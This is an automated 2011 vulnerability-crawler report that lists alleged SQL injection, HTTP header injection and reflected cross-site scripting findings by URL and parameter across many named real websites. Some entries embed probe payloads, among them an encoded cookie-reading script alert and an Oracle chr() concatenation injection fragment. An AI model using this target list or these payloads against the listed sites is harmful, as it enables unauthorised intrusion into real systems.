DORK, Report, XSS, SQL Injection, HTTPi, Response Splitting

The Daily DORK Report for Feb. 2, 2011 | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:27:43 CST 2011.

DORK CWE-79 XSS Report

1. SQL injection

1.1. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js [REST URL parameter 1]

1.2. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js [REST URL parameter 5]

1.3. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js [REST URL parameter 1]

1.4. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js [REST URL parameter 3]

1.5. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js [REST URL parameter 4]

1.6. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js [REST URL parameter 1]

1.7. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js [REST URL parameter 3]

1.8. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js [REST URL parameter 1]

1.9. http://blog.supermedia.com/archives/tips/ [REST URL parameter 2]

1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter]

1.11. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

1.12. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

1.13. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 2]

1.14. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 5]

1.15. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]

1.16. http://www.supermedia.com/support/contact-us/ [CstrStatus cookie]

1.17. https://www.supermedia.com/spportal/indexLogin.do [s_cc cookie]

1.18. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]

1.19. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [s_sq cookie]

1.20. http://www.youtube.com/ [Referer HTTP header]

1.21. http://www.youtube.com/ [hl parameter]

1.22. http://www.youtube.com/ [name of an arbitrarily supplied request parameter]

1.23. http://www8.tucows.com/delivery/afr.php [OAVARS[aed03704] cookie]

1.24. http://www8.tucows.com/delivery/afr.php [n parameter]

1.25. http://www8.tucows.com/delivery/afr.php [n parameter]

2. HTTP header injection

2.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

2.2. http://102.xg4ken.com/media/redir.php [url[] parameter]

2.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]

2.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

2.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]

2.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://abc.go.com/vp2/d/deeplink [REST URL parameter 3]

3.2. http://ads.adap.tv/beacons [callback parameter]

3.3. http://ads.gmodules.com/gadgets/ifr [url parameter]

3.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]

3.5. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

3.6. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

3.7. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

3.8. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

3.9. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

3.10. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 1]

3.11. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 2]

3.12. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 3]

3.13. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]

3.14. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]

3.15. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]

3.16. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 1]

3.17. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 2]

3.18. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 3]

3.19. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 1]

3.20. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 2]

3.21. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 3]

3.22. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 1]

3.23. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 2]

3.24. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 3]

3.25. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

3.26. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

3.27. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

3.28. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 1]

3.29. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 2]

3.30. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 3]

3.31. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

3.32. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

3.33. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

3.34. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

3.35. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

3.36. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

3.37. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

3.38. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

3.39. http://blog.supermedia.com/comment_html.php [cid parameter]

3.40. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

3.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

3.42. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]

3.43. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]

3.44. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]

3.45. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]

3.46. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]

3.47. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]

3.48. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]

3.49. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]

3.50. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.51. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]

3.52. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]

3.53. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]

3.54. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]

3.55. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]

3.56. http://clicktoverify.truste.com/pvr.php [sealid parameter]

3.57. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.58. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.59. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

3.60. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

3.61. http://digg.com/submit [REST URL parameter 1]

3.62. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json [callback parameter]

3.63. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.64. http://ll-appserver.veoh.com/styles/veoh-ie6.css [version parameter]

3.65. http://ll-appserver.veoh.com/styles/veoh.css [version parameter]

3.66. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]

3.67. http://managedq.com/search.php [q parameter]

3.68. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]

3.69. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]

3.70. http://my.supermedia.com/directoryoptout/ [37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter]

3.71. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]

3.72. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]

3.73. http://my.supermedia.com/directoryoptout/index.jsp [37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter]

3.74. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]

3.75. http://trc.taboolasyndication.com/dispatch/ [format parameter]

3.76. http://trc.taboolasyndication.com/dispatch/ [item-type parameter]

3.77. http://trc.taboolasyndication.com/dispatch/ [list-id parameter]

3.78. http://trc.taboolasyndication.com/dispatch/ [publisher parameter]

3.79. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]

3.80. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]

3.81. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]

3.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]

3.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]

3.84. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]

3.85. http://www.butterscotch.com/ [src parameter]

3.86. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

3.87. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

3.88. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

3.89. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

3.90. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

3.91. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

3.92. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

3.93. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

3.94. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

3.95. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

3.96. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

3.97. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

3.98. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

3.99. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

3.100. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

3.101. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

3.102. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

3.103. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

3.104. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

3.105. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

3.106. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

3.107. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

3.108. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

3.109. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

3.110. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

3.111. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

3.112. http://www.ip-adress.com/whois/smartdevil.com/x22 [REST URL parameter 2]

3.113. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]

3.114. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]

3.115. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]

3.116. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]

3.117. http://www.kminek.pl/bsdlicense.txt [REST URL parameter 1]

3.118. http://www.kminek.pl/kminek-css-1271705349.css [REST URL parameter 1]

3.119. http://www.kminek.pl/kminek-js-1249725108.js [REST URL parameter 1]

3.120. http://www.kminek.pl/lab/yetii/ [REST URL parameter 2]

3.121. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [REST URL parameter 1]

3.122. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]

3.123. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]

3.124. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]

3.125. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]

3.126. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]

3.127. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]

3.128. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]

3.129. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]

3.130. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]

3.131. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]

3.132. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.133. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.134. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.135. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.136. http://www.smartdraw.com/downloads [id parameter]

3.137. http://www.smartdraw.com/downloads [id parameter]

3.138. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]

3.139. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]

3.140. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]

3.141. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]

3.142. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]

3.143. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]

3.144. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]

3.145. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]

3.146. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]

3.147. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]

3.148. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.149. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.150. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.151. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.152. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.153. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.154. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.155. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.156. http://www.smartdraw.com/product/reviews [id parameter]

3.157. http://www.smartdraw.com/product/reviews [id parameter]

3.158. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]

3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]

3.160. http://www.smartdraw.com/product/x22 [REST URL parameter 1]

3.161. http://www.smartdraw.com/product/x22 [REST URL parameter 1]

3.162. http://www.smartdraw.com/product/x22 [REST URL parameter 2]

3.163. http://www.smartdraw.com/product/x22 [REST URL parameter 2]

3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]

3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]

3.166. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]

3.167. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]

3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]

3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]

3.170. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]

3.171. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]

3.172. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]

3.173. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]

3.174. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]

3.175. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]

3.176. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]

3.177. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]

3.178. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.179. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.180. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.181. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.182. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]

3.183. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]

3.184. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]

3.185. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]

3.186. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.187. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.188. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.189. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.190. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]

3.191. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]

3.192. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]

3.193. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]

3.194. http://www.smartdraw.com/support/x22 [REST URL parameter 1]

3.195. http://www.smartdraw.com/support/x22 [REST URL parameter 1]

3.196. http://www.smartdraw.com/support/x22 [REST URL parameter 2]

3.197. http://www.smartdraw.com/support/x22 [REST URL parameter 2]

3.198. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]

3.199. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]

3.200. http://www.smartdraw.com/training/x22 [REST URL parameter 1]

3.201. http://www.smartdraw.com/training/x22 [REST URL parameter 1]

3.202. http://www.smartdraw.com/training/x22 [REST URL parameter 2]

3.203. http://www.smartdraw.com/training/x22 [REST URL parameter 2]

3.204. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]

3.205. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]

3.206. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.207. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.208. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.209. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.210. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]

3.211. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]

3.212. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]

3.213. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]

3.214. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]

3.215. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]

3.216. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]

3.217. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]

3.218. http://www.smartdraw.com/x22 [REST URL parameter 1]

3.219. http://www.smartdraw.com/x22 [REST URL parameter 1]

3.220. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]

3.221. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]

3.222. http://www.stumbleupon.com/submit [url parameter]

3.223. https://www.supermedia.com/spportal/spportalFlow.do ['"--> parameter]

3.224. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]

3.225. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]

3.226. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]

3.227. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]

3.228. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

3.229. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

3.230. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

3.231. http://www.superpages.com/inc/social/soc.php [cg parameter]

3.232. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]

3.233. http://www.tucows.com/about.html [REST URL parameter 1]

3.234. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]

3.235. http://www.tucows.com/advertise.html [REST URL parameter 1]

3.236. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]

3.237. http://www.tucows.com/affiliate/index.html [REST URL parameter 1]

3.238. http://www.tucows.com/affiliate/index.html [REST URL parameter 2]

3.239. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]

3.240. http://www.tucows.com/author_ratings.html [REST URL parameter 1]

3.241. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]

3.242. http://www.tucows.com/contact.html [REST URL parameter 1]

3.243. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]

3.244. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 1]

3.245. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 2]

3.246. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 3]

3.247. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]

3.248. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

3.249. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

3.250. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

3.251. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

3.252. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

3.253. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 6]

3.254. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 7]

3.255. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [name of an arbitrarily supplied request parameter]

3.256. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 1]

3.257. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 2]

3.258. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 3]

3.259. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 4]

3.260. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 5]

3.261. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]

3.262. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 1]

3.263. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 2]

3.264. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 3]

3.265. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 4]

3.266. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 5]

3.267. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]

3.268. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 1]

3.269. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 2]

3.270. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 3]

3.271. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 4]

3.272. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 5]

3.273. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]

3.274. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 1]

3.275. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 2]

3.276. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 3]

3.277. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 4]

3.278. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 5]

3.279. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]

3.280. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 1]

3.281. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 2]

3.282. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 3]

3.283. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 4]

3.284. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 5]

3.285. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]

3.286. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 1]

3.287. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 2]

3.288. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 3]

3.289. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 4]

3.290. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 5]

3.291. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]

3.292. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 1]

3.293. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 2]

3.294. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 3]

3.295. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 4]

3.296. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 5]

3.297. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]

3.298. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

3.299. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

3.300. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

3.301. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

3.302. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 5]

3.303. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 6]

3.304. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [name of an arbitrarily supplied request parameter]

3.305. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

3.306. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

3.307. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

3.308. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

3.309. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 5]

3.310. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 6]

3.311. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [name of an arbitrarily supplied request parameter]

3.312. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 1]

3.313. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 2]

3.314. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 3]

3.315. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]

3.316. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 1]

3.317. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 2]

3.318. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 3]

3.319. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]

3.320. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 1]

3.321. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 2]

3.322. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 3]

3.323. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]

3.324. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 1]

